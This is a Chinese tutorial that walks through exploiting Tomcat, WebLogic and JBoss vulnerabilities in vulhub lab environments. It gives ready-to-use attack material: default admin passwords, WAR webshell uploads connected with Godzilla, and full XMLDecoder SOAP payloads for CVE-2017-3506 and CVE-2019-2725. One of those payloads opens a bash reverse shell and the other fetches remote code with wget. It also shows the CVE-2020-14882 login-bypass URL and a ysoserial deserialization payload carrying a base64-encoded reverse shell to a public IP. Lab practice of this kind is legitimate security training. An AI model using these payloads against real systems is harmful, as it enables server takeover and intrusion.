常见的中间件漏洞练习教程

发布于:2025-08-01 ⋅ 阅读:(15) ⋅ 点赞:(0)

Tomcat中间件漏洞练习

CVE-2017-12615

1.环境搭建(vul-hub)
cd vulhub-master/tomcat/CVE-2017-12615
docker-compose up -d
2.操作步骤

3.然后我们使用哥斯拉生成一个木马

4.然后我们刷新首页打开burpsuite拦击抓包,然后按照图片中提示修改包。

5。然后我们去访问这个文件,并使用哥斯拉连接

后台弱口令部署war包

1.环境搭建(vulhub)
cd vulhub-master/tomcat/tomcat8
docker-compose up -d
2.操作步骤

1.来打靶场后我们访问:http://47.105.65.103:8080/manager/html,然后按照图片中修改

2.将之前哥斯拉生成的木马,压缩然后修改文件名为:shell.war

3.登录成功后然后上传文件shell.war

4.然后我们尝试去访问一下这个文件路径如图所示。成功访问到。

5.然后我们尝试使用哥斯拉连接

CVE-2020-1938

1.环境搭建

cd vulhub-master/tomcat/CVE-2020-1938

docker-compose up -d
2.操作步骤

1.我们需要准备一个脚本

2.接下来我们打开kali,然后在工具包里面的打开终端然后输入:python2 duqu.py -p 8009 -f /WEB-INF/web.xml 47.105.65.103

就可以了

WebLogic

 后台弱口令GetShell

1.环境搭建
cd vulhub-master/weblogic/weak_password
docker-compose up -d
2.操作步骤

1.来到靶场后首页便是这样。

2.然后我们输入如图所示拼接路径,然后输入默认账户密码:weblogic/Oracle@123

3.然后我们如图所示操作,上传之前的shell.war文件,然后一直下一步就可以啦。

4.然后去访问我们上传的文件

5.尝试用哥斯拉连接

CVE-2017-3506

1.环境搭建
cd vulhub-master/weblogic/weak_password
docker-compose up -d
2.操作步骤

1访问:http://124.221.58.83:7001/wls-wsat/CoordinatorPortType  验证是否存在wls-wsat组件

2.然后在这个界面抓包,并输入:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
        <java version="1.8.0_131" class="java.beans.XMLDecoder">
          <object class="java.lang.ProcessBuilder">
            <array class="java.lang.String" length="3">
              <void index="0">
                <string>/bin/bash</string>
              </void>
              <void index="1">
                <string>-c</string>
              </void>
              <void index="2">
                <string>bash -i &gt;&amp; /dev/tcp/124.221.58.83/6666 0&gt;&amp;1</string>
              </void>
            </array>
          <void method="start"/></object>
        </java>
      </work:WorkContext>
    </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>

3.成功反弹到shell

CVE-2019-2725

1.环境搭建
cd vulhub-master/weblogic/weak_password
docker-compose up -d
2.操作步骤

1.输入:http://1.15.136.212:7001/_async/AsyncResponseService验证是否存在漏洞

2.在当前页面抓包,然后修改

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget http://114.132.92.17/2.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/678.jsp
</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header><soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

3.然后用哥斯拉连接

CVE-2018-2628

1.环境搭建
cd vulhub-master/weblogic/CVE-2018-2628
docker-compose up -d
2.操作步骤

1.然后我们用工具尝试去扫描,看到扫描出来漏洞

2.尝试利用漏洞,成功执行命令。

CVE-2018-2894

1.环境搭建
cd vulhub-master/weblogic/CVE-2018-2894
docker-compose up -d
2.操作步骤

1.首先获得随机密码,输入:docker-compose logs | grep password

2.然后我们登录后台,后台地址:Oracle WebLogic Server Administration Console

3.然后来到:121.40.229.129:7001/ws_utc/config.do,然后按照图片中操作。

然后修改文件保存路径:

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.w
ebservices.wls.ws-testclient-app-wls/4mcj4y/war/css

4.然后在在当前界面按f12检查源代码,查看id

5.连接哥斯拉,地址为:121.40.229.129:7001/ws_utc/css/config/keystore/1726815031601_shell.jsp

6.然后我们用哥斯拉连接一下即可

CVE-2020-14882

1.环境搭建
cd vulhub-master/weblogic/CVE-2020-14882
docker-compose up -d
2.操作步骤
1.访问管理控制台
http://121.40.229.129:7001/console/login/LoginForm.jsp
2.使⽤以下url绕过登录认证
http://121.40.229.129:7001 /console/css/%252e%252e%252fconsole.portal

Jboss

CVE-2015-7501

1.环境搭建
cd vulhub-master/jboss/JMXInvokerServlet-deserialization
docker-compose up -d
2.操作步骤
1.访问地址
http://121.40.229.129:8080/ invoker/JMXInvokerServlet
返回如下,说明接⼝开放,此接⼝存在反序列化漏洞

2.下载 ysoserial 工具进行漏洞利用
  https://github.com/frohoff/ysoserial
3.将反弹shell进行base64编码
bash -i >& /dev/tcp/114.132.92.17/6666 0>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTQuMTMyLjkyLjE3LzY2NjYgMD4mMSA=

4.然后执行:java -jar ysoserial-all.jar CommonsCollections5 "bash -c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDUuNjUuMTAzLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i} ">exp.ser

5.接着执行:curl http://47.105.65.103:8080//invoker/JMXInvokerServlet --data-binary @exp.ser

6.我们提前监听的机器成功监听到。

CVE-2017-7504

1.环境搭建
cd vulhub-master/jboss/CVE-2017-7504
docker-compose up -d
2.操作步骤
1.访问漏洞地址
http://121.40.229.129:8080/jbossmq-httpil/HTTPServerILServlet代表有漏洞

2.打开cmd输入:python3 jexboss.py -u http://121.40.229.129:8080,成功反弹到shell

CVE-2017-12149

1.环境搭建
cd vulhub-master/jboss/CVE-2017-12149
docker-compose up -d
2.操作步骤
1.验证是否存在漏洞 , 访问
http://121.40.229.129:8080/invoker/readonly
该漏洞出现在/invoker/readonly中 ,服务器将用户post请求内容进行反序列化

2.我们使用工具去检测一下,成功执行

Administration Console弱口令

1.环境搭建
cd vulhub-master/jboss/CVE-2017-12149
docker-compose up -d
2.操作步骤

1.首先访问后台http://121.40.229.129:8080/admin-console/login.seam,然后使用默认密码登录:admin vulhub

2.然后我们上传之前准备好的shell.war

3.成功上传。

4.然后我们用哥斯拉连接,成功连接。


网站公告

今日签到

点亮在社区的每一天
去签到